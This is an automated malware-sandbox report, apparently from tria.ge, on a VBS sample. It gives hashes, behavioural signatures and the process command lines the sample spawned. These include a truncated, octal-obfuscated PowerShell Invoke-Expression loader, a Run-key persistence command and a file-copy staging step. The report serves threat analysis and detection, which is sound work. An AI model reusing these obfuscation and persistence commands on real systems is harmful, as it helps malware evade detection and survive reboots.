Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
- max time kernel: 135s
- max time network: 105s
- platform: windows10-2004_x64
- resource: win10v2004-20240426-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 14/05/2024, 17:43
Static task: static1
Behavioral task: behavioral1
- Sample: 425d9a1f5eb07f8ba4ed354c757bb72e_JaffaCakes118.vbs
- Resource: win7-20240220-en
Behavioral task: behavioral2
- Sample: 425d9a1f5eb07f8ba4ed354c757bb72e_JaffaCakes118.vbs
- Resource: win10v2004-20240426-en
General
- Target: 425d9a1f5eb07f8ba4ed354c757bb72e_JaffaCakes118.vbs
- Size: 9KB
- MD5: 425d9a1f5eb07f8ba4ed354c757bb72e
- SHA1: c96f2b98374f7e2328f1e1ab80eed15fb6048198
- SHA256: 92a44d57e21fb7eb09cd897249ae3d2b3822f05f86846f9d3dfe9f750e96b362
- SHA512: c68e905289f1c6311b32084e55015adb97451a183aa4c228f320957b4b2fccaf6a4fa930d880632e03d44d77e8ab5fb51014cf33c0cdafae1c5e179faf51ab86
- SSDEEP: 96:5W9ZUDRCWmCqm9RYs8A3CNiLUB2cZmNwMwGgSe3OhTy/33s1l/S:0ulhc0222zGgJ3OhTy/cS
Malware Config
Signatures

Process spawned unexpected child process (3 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.

| description | pid | pid_target | Process | procid_target |
|---|---|---|---|---|
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 996 | 1744 | Powershell.exe | 83 |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3168 | 1744 | Powershell.exe | 83 |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1220 | 1744 | cmd.exe | 83 |

Blocklisted process makes network request (1 IoC)

| flow | pid | Process |
|---|---|---|
| 8 | 996 | Powershell.exe |

Adds Run key to start application (2 TTPs, 1 IoC)

| description | ioc | Process |
|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\425d9a1f5eb07f8ba4ed354c757bb72e_JaffaCakes118.vbs" | Powershell.exe |

Suspicious behavior: EnumeratesProcesses (4 IoCs)

| pid | Process |
|---|---|
| 996 | Powershell.exe |
| 3168 | Powershell.exe |
| 996 | Powershell.exe |
| 3168 | Powershell.exe |

Suspicious use of AdjustPrivilegeToken (44 IoCs)

| description | pid | Process |
|---|---|---|
| Token: SeDebugPrivilege | 996 | Powershell.exe |
| Token: SeDebugPrivilege | 3168 | Powershell.exe |
| Token: SeIncreaseQuotaPrivilege | 996 | Powershell.exe |
| Token: SeSecurityPrivilege | 996 | Powershell.exe |
| Token: SeTakeOwnershipPrivilege | 996 | Powershell.exe |
| Token: SeLoadDriverPrivilege | 996 | Powershell.exe |
| Token: SeSystemProfilePrivilege | 996 | Powershell.exe |
| Token: SeSystemtimePrivilege | 996 | Powershell.exe |
| Token: SeProfSingleProcessPrivilege | 996 | Powershell.exe |
| Token: SeIncBasePriorityPrivilege | 996 | Powershell.exe |
| Token: SeCreatePagefilePrivilege | 996 | Powershell.exe |
| Token: SeBackupPrivilege | 996 | Powershell.exe |
| Token: SeRestorePrivilege | 996 | Powershell.exe |
| Token: SeShutdownPrivilege | 996 | Powershell.exe |
| Token: SeDebugPrivilege | 996 | Powershell.exe |
| Token: SeSystemEnvironmentPrivilege | 996 | Powershell.exe |
| Token: SeRemoteShutdownPrivilege | 996 | Powershell.exe |
| Token: SeUndockPrivilege | 996 | Powershell.exe |
| Token: SeManageVolumePrivilege | 996 | Powershell.exe |
| Token: 33 | 996 | Powershell.exe |
| Token: 34 | 996 | Powershell.exe |
| Token: 35 | 996 | Powershell.exe |
| Token: 36 | 996 | Powershell.exe |
| Token: SeIncreaseQuotaPrivilege | 996 | Powershell.exe |
| Token: SeSecurityPrivilege | 996 | Powershell.exe |
| Token: SeTakeOwnershipPrivilege | 996 | Powershell.exe |
| Token: SeLoadDriverPrivilege | 996 | Powershell.exe |
| Token: SeSystemProfilePrivilege | 996 | Powershell.exe |
| Token: SeSystemtimePrivilege | 996 | Powershell.exe |
| Token: SeProfSingleProcessPrivilege | 996 | Powershell.exe |
| Token: SeIncBasePriorityPrivilege | 996 | Powershell.exe |
| Token: SeCreatePagefilePrivilege | 996 | Powershell.exe |
| Token: SeBackupPrivilege | 996 | Powershell.exe |
| Token: SeRestorePrivilege | 996 | Powershell.exe |
| Token: SeShutdownPrivilege | 996 | Powershell.exe |
| Token: SeDebugPrivilege | 996 | Powershell.exe |
| Token: SeSystemEnvironmentPrivilege | 996 | Powershell.exe |
| Token: SeRemoteShutdownPrivilege | 996 | Powershell.exe |
| Token: SeUndockPrivilege | 996 | Powershell.exe |
| Token: SeManageVolumePrivilege | 996 | Powershell.exe |
| Token: 33 | 996 | Powershell.exe |
| Token: 34 | 996 | Powershell.exe |
| Token: 35 | 996 | Powershell.exe |
| Token: 36 | 996 | Powershell.exe |
Processes

- C:\Windows\System32\WScript.exe (PID 1420)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\425d9a1f5eb07f8ba4ed354c757bb72e_JaffaCakes118.vbs"

- C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe (PID 996)
  Command line: Powershell $c145=-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])});sal cM1 $c145;$suXMbuGywgFCLg […] char[]]$suXMbuGywgFCLg -join ''|c`M`1
  Signatures:
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

- C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe (PID 3168)
  Command line: Powershell Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value 'C:\Users\Admin\AppData\Local\Microsoft\425d9a1f5eb07f8ba4ed354c757bb72e_JaffaCakes118.vbs'
  Signatures:
  - Process spawned unexpected child process
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

- C:\Windows\system32\cmd.exe (PID 1220)
  Command line: cmd /c copy "C:\Users\Admin\AppData\Local\Temp\425d9a1f5eb07f8ba4ed354c757bb72e_JaffaCakes118.vbs" "C:\Users\Admin\AppData\Local\Microsoft\" /Y
  Signatures:
  - Process spawned unexpected child process
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 2KB
- Filesize: 1KB
- Filesize: 60B